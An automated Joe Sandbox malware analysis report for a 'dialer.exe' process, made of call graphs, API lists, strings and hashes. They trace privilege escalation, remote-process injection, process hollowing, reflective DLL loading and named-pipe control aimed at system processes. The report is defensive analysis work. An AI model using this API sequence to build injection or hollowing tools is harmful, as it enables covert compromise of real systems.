API calls 594->607 596->583 603 7ff6cd4119ac 3 API calls 596->603 597->583 604 7ff6cd412ad3 ShellExecuteW 597->604 599->583 606 7ff6cd41296d GetProcessHeap HeapAlloc ReadFile 599->606 615 7ff6cd412ba0 600->615 609 7ff6cd412798 603->609 604->583 610 7ff6cd412a97 GetProcessHeap 606->610 611 7ff6cd4129b1 606->611 607->583 609->583 609->594 616 7ff6cd4127a8 609->616 614 7ff6cd412bde HeapFree 610->614 611->610 618 7ff6cd4129e2 611->618 619 7ff6cd412a05 lstrlenW GetProcessHeap HeapAlloc 611->619 612 7ff6cd412bd5 GetProcessHeap 612->614 614->583 615->612 666 7ff6cd4116d8 615->666 617 7ff6cd4110c0 30 API calls 616->617 617->583 618->610 646 7ff6cd411db4 618->646 623 7ff6cd412a49 619->623 660 7ff6cd412c18 CreateFileW 623->660 627 7ff6cd411b16 CoInitializeSecurity 626->627 628 7ff6cd411c35 SysFreeString SysFreeString 626->628 629 7ff6cd411b5e CoCreateInstance 627->629 630 7ff6cd411b52 627->630 628->588 631 7ff6cd411c2f CoUninitialize 629->631 632 7ff6cd411b92 VariantInit 629->632 630->629 630->631 631->628 633 7ff6cd411be8 632->633 633->631 635 7ff6cd4114e4 13 API calls 634->635 637 7ff6cd4117a6 635->637 636 7ff6cd4117d4 GetProcessHeap HeapFree 637->636 638 7ff6cd4116d8 5 API calls 637->638 638->637 640 7ff6cd411a14 2 API calls 639->640 641 7ff6cd41196d 640->641 643 7ff6cd411a68 ReadFile 642->643 644 7ff6cd411a8b 643->644 645 7ff6cd411aa5 643->645 644->643 644->645 645->583 645->592 647 7ff6cd411de0 646->647 648 7ff6cd411e3e CreateProcessW 647->648 651 7ff6cd411fc4 OpenProcess 647->651 653 7ff6cd411f2a VirtualAlloc 647->653 654 7ff6cd411ee4 WriteProcessMemory 647->654 659 7ff6cd411fb8 647->659 648->647 649 7ff6cd411e86 VirtualAllocEx 648->649 649->647 650 7ff6cd411eb9 WriteProcessMemory 649->650 650->647 651->647 652 7ff6cd411fd7 TerminateProcess 651->652 652->647 653->647 655 7ff6cd411f49 GetThreadContext 653->655 654->647 655->647 656 7ff6cd411f61 WriteProcessMemory 655->656 656->647 657 7ff6cd411f89 SetThreadContext 656->657 657->647 658 7ff6cd411fa9 ResumeThread 657->658 658->647 658->659 659->610 661 7ff6cd412a83 GetProcessHeap HeapFree 660->661 662 7ff6cd412c62 WriteFile 660->662 661->610 663 7ff6cd412c86 662->663 664 7ff6cd412ca4 CloseHandle 662->664 663->664 665 7ff6cd412c8a WriteFile 663->665 664->661 665->664 667 7ff6cd4116f7 OpenProcess 666->667 668 7ff6cd411751 666->668 667->668 669 7ff6cd41170f 667->669 668->612 670 7ff6cd4118f8 2 API calls 669->670 672 7ff6cd41172f 670->672 671 7ff6cd411748 CloseHandle 671->668 672->671 673 7ff6cd41173d CloseHandle 672->673 673->671 406 7ff6cd41228c 407 7ff6cd412299 406->407 409 7ff6cd4122b9 ConnectNamedPipe 407->409 410 7ff6cd4122ae Sleep 407->410 415 7ff6cd411c64 AllocateAndInitializeSid 407->415 411 7ff6cd4122c8 ReadFile 409->411 412 7ff6cd4122fd Sleep 409->412 410->407 413 7ff6cd412308 DisconnectNamedPipe 411->413 414 7ff6cd4122eb 411->414 412->413 413->409 414->413 416 7ff6cd411cc1 SetEntriesInAclW 415->416 417 7ff6cd411d9c 415->417 416->417 419 7ff6cd411d1e LocalAlloc 416->419 417->407 419->417 420 7ff6cd411d32 InitializeSecurityDescriptor 419->420 420->417 421 7ff6cd411d44 SetSecurityDescriptorDacl 420->421 421->417 422 7ff6cd411d5c CreateNamedPipeW 421->422 422->417 423 7ff6cd412cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 424 7ff6cd412d16 K32EnumProcesses 423->424 425 7ff6cd412d76 SleepEx 424->425 426 7ff6cd412d2b 424->426 425->424 426->425 428 7ff6cd4126c8 426->428 429 7ff6cd4126e0 428->429 430 7ff6cd4126d5 428->430 429->426 432 7ff6cd4110c0 430->432 470 7ff6cd4119ac OpenProcess 432->470 435 7ff6cd4114c5 435->429 436 7ff6cd411122 OpenProcess 436->435 437 7ff6cd41113e OpenProcess 436->437 438 7ff6cd411208 NtQueryInformationProcess 437->438 439 7ff6cd411161 K32GetModuleFileNameExW 437->439 440 7ff6cd4114bc CloseHandle 438->440 441 7ff6cd41122f 438->441 442 7ff6cd4111aa CloseHandle 439->442 443 7ff6cd41117a PathFindFileNameW lstrlenW 439->443 440->435 441->440 445 7ff6cd41123b OpenProcessToken 441->445 442->438 444 7ff6cd4111b8 442->444 443->442 446 7ff6cd411197 StrCpyW 443->446 444->438 447 7ff6cd4111e3 StrCmpIW 444->447 445->440 448 7ff6cd411259 GetTokenInformation 445->448 446->442 447->440 447->444 449 7ff6cd4112fc 448->449 450 7ff6cd411281 GetLastError 448->450 452 7ff6cd411303 CloseHandle 449->452 450->449 451 7ff6cd41128c LocalAlloc 450->451 451->449 453 7ff6cd4112a2 GetTokenInformation 451->453 452->440 457 7ff6cd411317 452->457 454 7ff6cd4112ea 453->454 455 7ff6cd4112ca GetSidSubAuthorityCount GetSidSubAuthority 453->455 456 7ff6cd4112f1 LocalFree 454->456 455->456 456->452 457->440 458 7ff6cd4113a6 StrStrA 457->458 459 7ff6cd4113ce 457->459 458->457 460 7ff6cd4113d3 458->460 459->440 460->440 461 7ff6cd4113fe VirtualAllocEx 460->461 461->440 462 7ff6cd41142b WriteProcessMemory 461->462 462->440 463 7ff6cd411446 462->463 475 7ff6cd4118f8 463->475 465 7ff6cd411466 465->440 466 7ff6cd41147c FindCloseChangeNotification 465->466 467 7ff6cd411483 WaitForSingleObject 465->467 466->440 467->466 469 7ff6cd411492 GetExitCodeThread 467->469 469->466 471 7ff6cd4119d8 IsWow64Process 470->471 472 7ff6cd41110e 470->472 473 7ff6cd4119f8 FindCloseChangeNotification 471->473 474 7ff6cd4119ea 471->474 472->435 472->436 473->472 474->473 478 7ff6cd411a14 GetModuleHandleA 475->478 479 7ff6cd411914 478->479 480 7ff6cd411a34 GetProcAddress 478->480 480->479 481 7ff6cd412314 484 7ff6cd412328 481->484 509 7ff6cd412078 484->509 488 7ff6cd412078 14 API calls 489 7ff6cd4123de GetCurrentProcessId OpenProcess 488->489 490 7ff6cd412486 FindResourceA 489->490 491 7ff6cd412400 OpenProcessToken 489->491 494 7ff6cd4124a6 SizeofResource 490->494 495 7ff6cd41231d ExitProcess 490->495 492 7ff6cd412419 LookupPrivilegeValueW 491->492 493 7ff6cd41247d FindCloseChangeNotification 491->493 492->493 497 7ff6cd412433 AdjustTokenPrivileges 492->497 493->490 494->495 496 7ff6cd4124bf LoadResource 494->496 496->495 498 7ff6cd4124d3 LockResource GetCurrentProcessId 496->498 497->493 499 7ff6cd412477 GetLastError 497->499 526 7ff6cd4117f8 GetProcessHeap RtlAllocateHeap 498->526 499->493 501 7ff6cd4124f0 RegCreateKeyExW 502 7ff6cd41260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 501->502 503 7ff6cd412532 ConvertStringSecurityDescriptorToSecurityDescriptorW 501->503 506 7ff6cd412693 SleepEx 502->506 504 7ff6cd412566 RegSetKeySecurity LocalFree 503->504 505 7ff6cd412587 RegCreateKeyExW 503->505 504->505 507 7ff6cd412602 RegCloseKey 505->507 508 7ff6cd4125c3 GetCurrentProcessId RegSetValueExW RegCloseKey 505->508 506->506 507->502 508->507 510 7ff6cd412270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 509->510 511 7ff6cd412081 StrCpyW StrCatW GetModuleHandleW 509->511 510->488 511->510 512 7ff6cd4120d3 511->512 512->512 513 7ff6cd41210c GetCurrentProcess K32GetModuleInformation 512->513 514 7ff6cd412267 FreeLibrary 513->514 515 7ff6cd41212e CreateFileW 513->515 514->510 515->514 516 7ff6cd412163 CreateFileMappingW 515->516 517 7ff6cd41218d MapViewOfFile 516->517 518 7ff6cd41225e CloseHandle 516->518 519 7ff6cd4121b1 517->519 520 7ff6cd412255 FindCloseChangeNotification 517->520 518->514 519->520 521 7ff6cd4121cc lstrcmpi 519->521 523 7ff6cd4121fd 519->523 520->518 521->519 522 7ff6cd4121ff VirtualProtect 521->522 532 7ff6cd4118b8 522->532 523->520 525 7ff6cd41223a VirtualProtect 525->520 534 7ff6cd4114e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 526->534 528 7ff6cd411891 GetProcessHeap HeapFree 529 7ff6cd41183c 529->528 530 7ff6cd41185d OpenProcess 529->530 530->529 531 7ff6cd411873 TerminateProcess CloseHandle 530->531 531->529 533 7ff6cd4118c7 532->533 533->525 533->533 535 7ff6cd41163b GetProcessHeap RtlDeleteBoundaryDescriptor GetProcessHeap RtlRestoreThreadPreferredUILanguages 534->535 536 7ff6cd411571 534->536 535->529 536->535 537 7ff6cd411586 OpenProcess 536->537 539 7ff6cd411626 FindCloseChangeNotification 536->539 540 7ff6cd4115d5 ReadProcessMemory 536->540 537->536 538 7ff6cd4115a3 K32EnumProcessModules 537->538 538->536 538->539 539->536 540->536 541 7ff6cd412d84 542 7ff6cd412d91 541->542 543 7ff6cd411c64 6 API calls 542->543 544 7ff6cd412da6 Sleep 542->544 545 7ff6cd412db1 ConnectNamedPipe 542->545 543->542 544->542 546 7ff6cd412e0f Sleep 545->546 547 7ff6cd412dc0 ReadFile 545->547 548 7ff6cd412e1a DisconnectNamedPipe 546->548 547->548 549 7ff6cd412de3 547->549 548->545 552 7ff6cd4126ac 549->552 553 7ff6cd4126b9 552->553 554 7ff6cd4126c1 WriteFile 552->554 555 7ff6cd4110c0 30 API calls 553->555 554->548 555->554

                                                Callgraph

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: CreateProcess$Close$CurrentResource$ConditionFileFindMaskSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenTokenValue$AdjustAllocConvertErrorInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                • API String ID: 2174858571-1130149537
                                                • Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                • Instruction ID: 5fccfbdcf646e4cb68a407c14b566e0837a07cdc86d0cc651847fbfdc370937b
                                                • Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                • Instruction Fuzzy Hash: 54A10035B09B8286E720DF61E8483AA77A2FB84756F448135DBAD87768EF3CD158C700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 26 7ff6cd4110c0-7ff6cd411110 call 7ff6cd4119ac 29 7ff6cd411116-7ff6cd41111c 26->29 30 7ff6cd4114c5-7ff6cd4114e1 26->30 29->30 31 7ff6cd411122-7ff6cd411138 OpenProcess 29->31 31->30 32 7ff6cd41113e-7ff6cd41115b OpenProcess 31->32 33 7ff6cd411208-7ff6cd411229 NtQueryInformationProcess 32->33 34 7ff6cd411161-7ff6cd411178 K32GetModuleFileNameExW 32->34 35 7ff6cd4114bc-7ff6cd4114bf CloseHandle 33->35 36 7ff6cd41122f-7ff6cd411235 33->36 37 7ff6cd4111aa-7ff6cd4111b6 CloseHandle 34->37 38 7ff6cd41117a-7ff6cd411195 PathFindFileNameW lstrlenW 34->38 35->30 36->35 40 7ff6cd41123b-7ff6cd411253 OpenProcessToken 36->40 37->33 39 7ff6cd4111b8-7ff6cd4111df 37->39 38->37 41 7ff6cd411197-7ff6cd4111a7 StrCpyW 38->41 42 7ff6cd4111e3-7ff6cd4111f5 StrCmpIW 39->42 40->35 43 7ff6cd411259-7ff6cd41127f GetTokenInformation 40->43 41->37 42->35 44 7ff6cd4111fb-7ff6cd411206 42->44 45 7ff6cd4112fc 43->45 46 7ff6cd411281-7ff6cd41128a GetLastError 43->46 44->33 44->42 48 7ff6cd411303-7ff6cd411311 CloseHandle 45->48 46->45 47 7ff6cd41128c-7ff6cd4112a0 LocalAlloc 46->47 47->45 49 7ff6cd4112a2-7ff6cd4112c8 GetTokenInformation 47->49 48->35 50 7ff6cd411317-7ff6cd41131e 48->50 52 7ff6cd4112ea 49->52 53 7ff6cd4112ca-7ff6cd4112e8 GetSidSubAuthorityCount GetSidSubAuthority 49->53 50->35 51 7ff6cd411324-7ff6cd41132f 50->51 51->35 54 7ff6cd411335-7ff6cd41133f 51->54 55 7ff6cd4112f1-7ff6cd4112fa LocalFree 52->55 53->55 54->35 56 7ff6cd411345-7ff6cd41134f 54->56 55->48 56->35 57 7ff6cd411355-7ff6cd411395 call 7ff6cd412010 * 3 56->57 57->35 64 7ff6cd41139b-7ff6cd4113bb call 7ff6cd412010 StrStrA 57->64 67 7ff6cd4113bd-7ff6cd4113cc 64->67 68 7ff6cd4113d3-7ff6cd4113f8 call 7ff6cd412010 * 2 64->68 67->64 70 7ff6cd4113ce 67->70 68->35 74 7ff6cd4113fe-7ff6cd411425 VirtualAllocEx 68->74 70->35 74->35 75 7ff6cd41142b-7ff6cd411444 WriteProcessMemory 74->75 75->35 76 7ff6cd411446-7ff6cd411468 call 7ff6cd4118f8 75->76 76->35 79 7ff6cd41146a-7ff6cd411472 76->79 79->35 80 7ff6cd411474-7ff6cd41147a 79->80 81 7ff6cd41147c-7ff6cd411481 80->81 82 7ff6cd411483-7ff6cd411490 WaitForSingleObject 80->82 83 7ff6cd4114b6 FindCloseChangeNotification 81->83 84 7ff6cd4114b1 82->84 85 7ff6cd411492-7ff6cd4114a6 GetExitCodeThread 82->85 83->35 84->83 85->84 86 7ff6cd4114a8-7ff6cd4114ae 85->86 86->84
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                • API String ID: 2998269048-2835194517
                                                • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                • Instruction ID: 35038b3f3d5111e4092ae09f25261fe632e5bde77bc48e6003a8973d6421c7c8
                                                • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                • Instruction Fuzzy Hash: C0B15F71B0864286EB20DF11E88467937A5FF45B86F008136CBAE97758EF3CE565C748

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                • String ID:
                                                • API String ID: 2219672174-0
                                                • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                • Instruction ID: e15997a5de7c56fe5f69abfdd0b4683aef2c6a9a68005a02404f0cb63de180fc
                                                • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                • Instruction Fuzzy Hash: 9551C032B156828BEB60CF62E8486A937A1FB49B86F488035DFAD87754EF3CD455C700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                • String ID:
                                                • API String ID: 3197395349-0
                                                • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                • Instruction ID: c7770cc6df0221ffdad95c47ce072471913df5b39cc84079b157e256e94a2d7c
                                                • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                • Instruction Fuzzy Hash: DE416C32B14A51CAE760CF24E4847A93BB4FB44798F40513AEB9D87B98EF78D518CB40

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                • String ID:
                                                • API String ID: 3158079169-0
                                                • Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                • Instruction ID: 7fc1e6537a1fdea19ccf43a3f59be55b1efb3892b11d307eead0155eae1fb6cd
                                                • Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                • Instruction Fuzzy Hash: D3117221F0964285EB189F56E80416977A2EF8AB92F08C035DF9D83755EE3DD4658700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                • String ID: .text$C:\Windows\System32\
                                                • API String ID: 1125510917-832442975
                                                • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                • Instruction ID: 7d625692ce3b1e1cb1a4343340b22d8cb4e0e574c2f4961f115af8b4e5aebabb
                                                • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                • Instruction Fuzzy Hash: DC51833670964282EB21DF11E85866B77A1FB89B9AF448131DF9D83794EF3CD429C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                • API String ID: 2203880229-3489460547
                                                • Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                • Instruction ID: 2062568017af6de4727dd3bef01642c8a218d57de740443d4457dea7b0100dd7
                                                • Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                • Instruction Fuzzy Hash: 6111512171868292E614DF21E4583BA7761EB85BA2F04C234DBAEC26D4EF3CE428C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                • API String ID: 2071455217-3440882674
                                                • Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                • Instruction ID: cf1d8e108987a5062a791ebe5b2bf4a9e288f2dc85942875ea54bbca84856eda
                                                • Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                • Instruction Fuzzy Hash: 6A015E20B0864291EA149F21E84937E7771AF41BA2F54C234DBBEC66D4EF7CE468C700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                • String ID:
                                                • API String ID: 3676546796-0
                                                • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                • Instruction ID: d7edc70eb3da2de186547581d5cbe8c62d8def434fb3a0810ca05b04aeb6bdeb
                                                • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                • Instruction Fuzzy Hash: 64218771B096528BE3149F16E49553A7672FB82B82F14C038DF9A87764EF3DE454CB40

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                • String ID:
                                                • API String ID: 3805842350-0
                                                • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                • Instruction ID: a9818b0c9492d5de2d6376b34e6c890c08253ecf036f5d9e9dc0451399619582
                                                • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                • Instruction Fuzzy Hash: 41F01D21B0978283EB548F16B5882296661FB89BC1F44D039EB9D83758EF3DD455C700

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF6CD412328: VerSetConditionMask.NTDLL ref: 00007FF6CD412397
                                                  • Part of subcall function 00007FF6CD412328: VerSetConditionMask.NTDLL ref: 00007FF6CD4123A8
                                                  • Part of subcall function 00007FF6CD412328: VerSetConditionMask.NTDLL ref: 00007FF6CD4123B9
                                                  • Part of subcall function 00007FF6CD412328: VerifyVersionInfoW.KERNEL32 ref: 00007FF6CD4123CC
                                                  • Part of subcall function 00007FF6CD412328: GetCurrentProcessId.KERNEL32 ref: 00007FF6CD4123DE
                                                  • Part of subcall function 00007FF6CD412328: OpenProcess.KERNEL32 ref: 00007FF6CD4123EE
                                                  • Part of subcall function 00007FF6CD412328: OpenProcessToken.ADVAPI32 ref: 00007FF6CD41240F
                                                  • Part of subcall function 00007FF6CD412328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6CD412429
                                                  • Part of subcall function 00007FF6CD412328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6CD41246D
                                                  • Part of subcall function 00007FF6CD412328: GetLastError.KERNEL32 ref: 00007FF6CD412477
                                                  • Part of subcall function 00007FF6CD412328: FindCloseChangeNotification.KERNELBASE ref: 00007FF6CD412480
                                                  • Part of subcall function 00007FF6CD412328: FindResourceA.KERNEL32 ref: 00007FF6CD412494
                                                  • Part of subcall function 00007FF6CD412328: SizeofResource.KERNEL32 ref: 00007FF6CD4124AB
                                                  • Part of subcall function 00007FF6CD412328: LoadResource.KERNEL32 ref: 00007FF6CD4124C4
                                                  • Part of subcall function 00007FF6CD412328: LockResource.KERNEL32 ref: 00007FF6CD4124D6
                                                  • Part of subcall function 00007FF6CD412328: GetCurrentProcessId.KERNEL32 ref: 00007FF6CD4124E3
                                                • ExitProcess.KERNEL32 ref: 00007FF6CD41231F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Resource$ConditionMask$CurrentFindOpenToken$AdjustChangeCloseErrorExitInfoLastLoadLockLookupNotificationPrivilegePrivilegesSizeofValueVerifyVersion
                                                • String ID:
                                                • API String ID: 1125160344-0
                                                • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                • Instruction ID: 58d0e3a566d146884cc972cb432ab4a0d3a8b3d8de1c2ea10f0828131ba429d0
                                                • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
